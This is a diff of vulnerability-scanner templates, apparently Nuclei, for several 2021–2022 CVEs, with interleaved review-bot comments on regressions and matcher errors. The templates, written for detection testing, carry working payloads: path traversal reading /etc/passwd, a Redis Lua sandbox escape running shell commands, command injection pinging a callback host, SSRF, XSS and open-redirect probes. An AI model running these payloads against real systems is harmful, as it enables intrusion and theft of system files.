+ metadata: + max-request: 1 + vendor: rubyonrails + product: rails + tags: seclists,cve,cve2021,redirect + +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Host: //example.com + X-Forwarded-Host: //interact.sh + matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 + - type: status status: - 301 - 302 - 307 - 308 - -# Enhanced by mp on 2022/02/28 +# digest: 4a0a00473045022100927ef487ce8525eb6bc6cbf4c8622cd0692dcd777d1f61e850e485a92bccace00220331e35cc76348e1302e955890a2baca3550d488ae9a8d9f171568805a9d92502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2021-45428.yaml b/poc/cve/CVE-2021-45428.yaml index 2ba8ceec99..38efcc2a0b 100644 --- a/poc/cve/CVE-2021-45428.yaml +++ b/poc/cve/CVE-2021-45428.yaml @@ -1,10 +1,13 @@ id: CVE-2021-45428 + info: name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload author: gy741 severity: critical description: | TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + remediation: | + Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability. reference: - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html @@ -14,11 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 + epss-score: 0.08441 + epss-percentile: 0.93762 + cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 3 + vendor: telesquare + product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive,fileupload -requests: + tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm + +http: - raw: - | GET /{{randstr}}.txt HTTP/1.1 @@ -31,7 +41,7 @@ requests: - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - req-condition: true + matchers-condition: and matchers: - type: dsl @@ -39,5 +49,4 @@ requests: - 'status_code_1 == 404 && status_code_2 == 201' - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' condition: and - -# Enhanced by mp on 2022/05/19 +# digest: 4a0a0047304502200785f1ed654c3001b4456f995af1987209ad67b355ce59ff4f04dfbdf73208910221009f914a6fa692d6e69743b66383fba182d469ac65bc0c89b22cbe4fca04e60278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2021-45967.yaml b/poc/cve/CVE-2021-45967.yaml index 76555bb8ed..81cbcc59d8 100644 --- a/poc/cve/CVE-2021-45967.yaml +++ b/poc/cve/CVE-2021-45967.yaml @@ -1,43 +1,26 @@ id: CVE-2021-45967 - info: name: Pascom CPS Server-Side Request Forgery author: dwisiswant0 - severity: critical + severity: high description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. - remediation: | - Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: - https://kerbit.io/research/read/blog/4 - - https://www.pascom.net/doc/en/release-notes/ - - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - - https://www.pascom.net/doc/en/release-notes/pascom19/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2021-45967 - cwe-id: CWE-22 - epss-score: 0.73933 - epss-percentile: 0.97814 - cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: pascom_cloud_phone_system tags: cve,cve2021,pascom,ssrf - -http: +requests: - method: GET path: - - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" - + - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS) matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status status: - 200 -# digest: 490a004630440220736ad7ba9cd0702307414abe78b0d18e6040b4c8cf196dc83220ad0c5288b83f02207d20002d55fc32f0052297d7ded57e40ef437d0dae015dd7ba87e90f2e5deeeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-45968.yaml b/poc/cve/CVE-2021-45968.yaml index 9067ec9b3e..9b6be56383 100644 
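Review bot: The new side of this file goes back to the legacy `requests:` key and drops `remediation`, the CVSS vector, `cwe-id` and the `metadata` block, while CVE-2021-44451 and CVE-2021-44528 in this same commit move the other way, to `http:` with full classification. The same reversal shows in the hunks for CVE-2021-45968, CVE-2021-46005, CVE-2021-46379, CVE-2021-46381 and CVE-2022-0208, and as `tcp:` back to `network:` in CVE-2022-0543. It looks as if an older copy overwrote a newer one during the sync. I would keep `http:` and the removed `remediation:` text so findings still carry a fix recommendation. Here `severity` also moves from `critical` to `high` with no vector left to support either value.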
--- a/poc/cve/CVE-2021-45968.yaml +++ b/poc/cve/CVE-2021-45968.yaml @@ -1,46 +1,36 @@ id: CVE-2021-45968 - info: - name: Pascom CPS - Local File Inclusion + name: Pascom CPS Path Traversal author: dwisiswant0 severity: high description: | - Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. + Pascom version packaged with Cloud Phone System (CPS) + versions before 7.20 contains a known path traversal issue reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-45968 - - https://jivesoftware.com/platform/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-45968 - cwe-id: CWE-918 - epss-score: 0.01864 - epss-percentile: 0.87022 - cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: jivesoftware - product: jive + cwe-id: CWE-22 tags: cve,cve2021,pascom,lfi - -http: +requests: - raw: - | GET /services/pluginscript/ HTTP/1.1 Host: {{Hostname}} + - | # Double parent to access CMS index GET /services/pluginscript/..;/..;/ HTTP/1.1 Host: {{Hostname}} + - | # Verifying CMS GET / HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers: - type: dsl dsl: - "status_code_2 != status_code_1" + - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS condition: and -# digest: 4b0a00483046022100d621ee16b129bbaadc4568fbe3b7c0820d1afdd7dce5367981414eab60108e2c0221009a4c0db4d6ff239b688e3ed9594419635bce919b3fcddee3da1cf8679e13c655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2021-46005.yaml b/poc/cve/CVE-2021-46005.yaml index f355cb8247..4e7759ce9c 100644 --- a/poc/cve/CVE-2021-46005.yaml +++ b/poc/cve/CVE-2021-46005.yaml @@ -1,31 +1,19 @@ id: CVE-2021-46005 - info: name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting author: cckuailong severity: medium description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. - remediation: | - To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/49546 - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 - - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 - epss-score: 0.00143 - epss-percentile: 0.50029 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: car_rental_management_system_project - product: car_rental_management_system - tags: sourcecodester,authenticated,edb,cve,cve2021,xss,intrusive - -http: + tags: cve,cve2021,xss,sourcecodester,authenticated +requests: - raw: - | POST /admin/ HTTP/1.1 @@ -100,20 +88,19 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - - + - "" - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a004630440220502dc1617d55c09997409f2f2ed277fad50494089ed7c1f7fd8929984700782f0220383d3a2a240ee11993e6930e4cf893c8b3e2cee4bf0b82c6566a4854a265caef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/28 
diff --git a/poc/cve/CVE-2021-46379.yaml b/poc/cve/CVE-2021-46379.yaml index 841a1a4f7f..270692bd08 100644 --- a/poc/cve/CVE-2021-46379.yaml +++ b/poc/cve/CVE-2021-46379.yaml @@ -5,8 +5,6 @@ info: author: 0x_Akoko severity: medium description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. - remediation: | - Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-46379 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view @@ -17,17 +15,11 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46379 cwe-id: CWE-601 - epss-score: 0.00245 - epss-percentile: 0.6241 - cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: dlink - product: dir-850l_firmware + verified: "true" tags: cve,cve2021,redirect,dlink,router -http: +requests: - method: GET path: - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1' @@ -36,5 +28,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e02d1cce2b989a2e4838c77be9e9a1edabe5eac068b4d992f1a81aea6218648d022100d9834374f4d1729bcc0ed92095d52f8a1d298226c3f495ee270c96d1c4283f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by cs 06/22/2022 diff --git a/poc/cve/CVE-2021-46381.yaml b/poc/cve/CVE-2021-46381.yaml index 87de041334..db6eb200e6 100644 --- a/poc/cve/CVE-2021-46381.yaml +++ b/poc/cve/CVE-2021-46381.yaml 
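Review bot: The `Location` regex in the last hunk makes the scheme group optional again (`(?:https?:\/\/|\/\/|\/\\\\|\/\\)?`), so a relative value such as `Location: interact.sh/` is reported as an open redirect even though the browser resolves it against the device's own origin. The removed line, and the CVE-2021-44528 template in this same commit, require the scheme or `//` prefix; I would keep that form by dropping the `?` that follows the group. No status matcher is visible in the hunk either, so if none exists above it, adding `- type: status` with `301`, `302`, `307` and `308`, as CVE-2021-44528 does, would cut false positives further. The `matchers:` list starts outside the hunk.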
@@ -1,40 +1,26 @@ id: CVE-2021-46381 - info: name: D-Link DAP-1620 - Local File Inclusion author: 0x_Akoko severity: high - description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. - remediation: | - Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. + description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. reference: - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing + - https://www.cvedetails.com/cve/CVE-2021-46381/ - https://www.dlink.com/en/security-bulletin/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-46381 - - http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.01734 - epss-percentile: 0.86477 - cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: dap-1620_firmware - tags: lfi,router,packetstorm,cve,cve2021,dlink - -http: + tags: cve,cve2021,dlink,lfi +requests: - method: POST path: - "{{BaseURL}}/apply.cgi" - body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass" matchers: - type: regex part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100b5179914ad77b2772694e394be5e966b20d789ebe6d28400fb0da1c3605bab30022100973df25cdce290736713b6c19b87117b340a8d42974e441821a82797cf2680fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2021-46417.yaml b/poc/cve/CVE-2021-46417.yaml index 44a73fc756..239cff14c0 100644 --- a/poc/cve/CVE-2021-46417.yaml +++ b/poc/cve/CVE-2021-46417.yaml @@ -1,10 +1,13 @@ id: CVE-2021-46417 + info: name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion author: For3stCo1d severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. + remediation: | + Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R @@ -15,18 +18,25 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 + epss-score: 0.66274 + epss-percentile: 0.97604 + cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: franklinfueling + product: colibri_firmware shodan-query: http.html:"Franklin Fueling Systems" - verified: "true" - tags: cve,cve2021,franklinfueling,lfi -requests: + tags: packetstorm,cve,cve2021,franklinfueling,lfi + +http: - method: GET path: - "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=" + matchers: - type: regex part: body regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/06/29 +# digest: 4a0a00473045022100a0e93b4401052e19fe162fff63f71f8455172af23a8cdf55b8c5089ab82a5f940220242bcd3cab212ed9cd1007e55230d12bf622f05bd842f946ceade22637d496ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-46422.yaml b/poc/cve/CVE-2021-46422.yaml index 9ebd55b6bf..b68600bd9f 100644 
--- a/poc/cve/CVE-2021-46422.yaml +++ b/poc/cve/CVE-2021-46422.yaml @@ -1,40 +1,52 @@ id: CVE-2021-46422 + info: name: SDT-CW3B1 1.1.0 - OS Command Injection author: badboycxcc,prajiteshsingh severity: critical description: | Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + remediation: | + Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50936 - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T? - https://nvd.nist.gov/vuln/detail/CVE-2021-46422 - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing + - http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-46422 cwe-id: CWE-78 + epss-score: 0.9462 + epss-percentile: 0.99043 + cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: telesquare + product: sdt-cs3b1_firmware shodan-query: html:"SDT-CW3B1" - verified: "true" - tags: cve,cve2021,telesquare,rce,router,injection + tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" -requests: + +http: - method: GET path: - "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}" + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word - part: interactsh_protocol name: http + part: interactsh_protocol words: - "dns" - -# Enhanced by mp on 2022/05/18 +# digest: 4a0a00473045022100d89c94c82a5311f9db9c6f0ec9f0656eceac2cc9d8858bd5c2196dc8f7dc16f602202f9c31e9d9856235670ebe95f4c29d4c02a6f81174d37e1364336a7e78723fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
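Review bot: The interaction matcher is labelled `name: http` but its `words` entry is `dns`, and the `cmd` variable is a `ping`, which would only cause a name lookup for the callback host. The matcher name is what appears in scan output, so a triager reading the finding is told the device made an HTTP callback when only DNS resolution was observed. I would change the line to `name: dns` and add the trailing comment `# Confirms the DNS Interaction` on the `part: interactsh_protocol` line, as another template in this commit does.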
diff --git a/poc/cve/CVE-2022-0208.yaml b/poc/cve/CVE-2022-0208.yaml
index 0492fdd641..f5500b8187 100644
--- a/poc/cve/CVE-2022-0208.yaml
+++ b/poc/cve/CVE-2022-0208.yaml
@@ -1,51 +1,34 @@ id: CVE-2022-0208 - info: - name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting + name: WordPress Plugin MapPress < 2.73.4 - Reflected XSS author: edoardottt severity: medium - description: | - WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. - remediation: | - Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. - reference: - - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + description: The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.4302 - cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: mappresspro - product: mappress - framework: wordpress - tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve - -http: + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc + tags: cve,cve2022,mappress,xss,wordpress,wp-plugin +requests: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - type: word part: body words: - "" - "Bad mapid" condition: and - - - type: status - status: - - 200 -# digest: 
490a00463044022012033fcb20768f20bef0d16e03da98ce04748b210dc655f17f94645038e4d3ef022002c3f040c2c4d832d58167c68785750e1fb63ba00ffeb6b0b6e909c01071b2a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0281.yaml b/poc/cve/CVE-2022-0281.yaml index b09f892f79..7dd988f3b2 100644 --- a/poc/cve/CVE-2022-0281.yaml +++ b/poc/cve/CVE-2022-0281.yaml @@ -4,29 +4,35 @@ info: name: Microweber Information Disclosure author: pikpikcu severity: high - description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11. + description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 - tags: cve,cve2022,microweber,disclosure - metadata: - shodan-query: 'http.favicon.hash:780351152' + - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 + - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 + epss-score: 0.0051 + epss-percentile: 0.73924 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,disclosure,huntr -requests: +http: - method: GET path: - "{{BaseURL}}/api/users/search_authors" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: 
@@ -34,3 +40,8 @@ requests: - '"email":' - '"display_name":' condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100876beb076e34a46ab7d43140cc9fba2343a94cf835e2f082d3ac524425a5b164022061fd8880269a24b753a505508c6b14ecf4be46a2dc9d1a4048776bb6cbde7bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0543.yaml b/poc/cve/CVE-2022-0543.yaml index 2f61707354..00d78f467c 100644 --- a/poc/cve/CVE-2022-0543.yaml +++ b/poc/cve/CVE-2022-0543.yaml 
@@ -1,43 +1,35 @@ id: CVE-2022-0543 - info: name: Redis Sandbox Escape - Remote Code Execution author: dwisiswant0 severity: critical description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 - - https://lists.debian.org/debian-security-announce/2022/msg00048.html - remediation: Update to the most recent versions currently available. 
classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-0543 - cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* - epss-score: 0.97184 metadata: - max-request: 2 - product: redis shodan-query: redis_version - vendor: redis tags: cve,cve2022,network,redis,unauth,rce,kev - -tcp: - - host: - - "{{Hostname}}" - - "tls://{{Hostname}}" - port: 6380 - - inputs: +network: + - inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + host: + - "{{Hostname}}" + - "{{Host}}:6379" read-size: 64 - matchers: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a004830460221009d349fed6b3bf4fd9604533cb5f57ffcec818eda7e49ac4e7be81dc1c5a2b0b3022100902ed033bee2919852cc2e890b5a5aa71600e31aabf41f1f1f957cf4286a4cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/CVE-2022-0594.yaml b/poc/cve/CVE-2022-0594.yaml index 556161c193..bd5afa0969 100644 --- a/poc/cve/CVE-2022-0594.yaml +++ b/poc/cve/CVE-2022-0594.yaml 
@@ -1,25 +1,38 @@ id: CVE-2022-0594 + info: - name: Shareaholic < 9.7.6 - Information Disclosure + name: WordPress Shareaholic <9.7.6 - Information Disclosure author: atomiczsec severity: medium - description: The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc. + description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + remediation: | + Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 - https://wordpress.org/plugins/shareaholic/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0594 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0594 cwe-id: CWE-863 + epss-score: 0.00253 + epss-percentile: 0.63056 + cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,exposure -requests: + verified: true + max-request: 1 + vendor: shareaholic + product: shareaholic + framework: wordpress + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan + +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info" + matchers-condition: and matchers: - type: word 
@@ -28,10 +41,13 @@ requests: - 'plugin_version' - 'shareaholic_server_reachable' condition: and + - type: word part: header words: - "application/json" + - type: status status: - 200 +# digest: 4b0a00483046022100ad680fa82672dfb33116f5fbdecf288a33462d9759b5aee4a219da0d8f3c098202210082a2ecb63d802970bfc282ace75324c3e5a69fc74cf7186b2ae428c9457de6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0599.yaml b/poc/cve/CVE-2022-0599.yaml index 9c91f354e8..5483685da6 100644 --- a/poc/cve/CVE-2022-0599.yaml +++ b/poc/cve/CVE-2022-0599.yaml @@ -1,10 +1,13 @@ id: CVE-2022-0599 + info: - name: The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 - Reflected XSS + name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting author: scent2d severity: medium description: | - The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. + WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + remediation: | + Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ 
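Review bot: The `remediation` added to CVE-2022-0599.yaml recommends "version 5.8 or higher", but the new `name` in the same hunk marks the plugin as affected `<=5.8` and the description says "5.8 and prior", so following the advice literally can leave a site on a vulnerable release. The visible references do not establish a fixed version, so the text should not name one: `Update the plugin to a release later than 5.8, or remove it if no fixed release is available.` The request and matcher sections of this template are in the hunks that follow.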
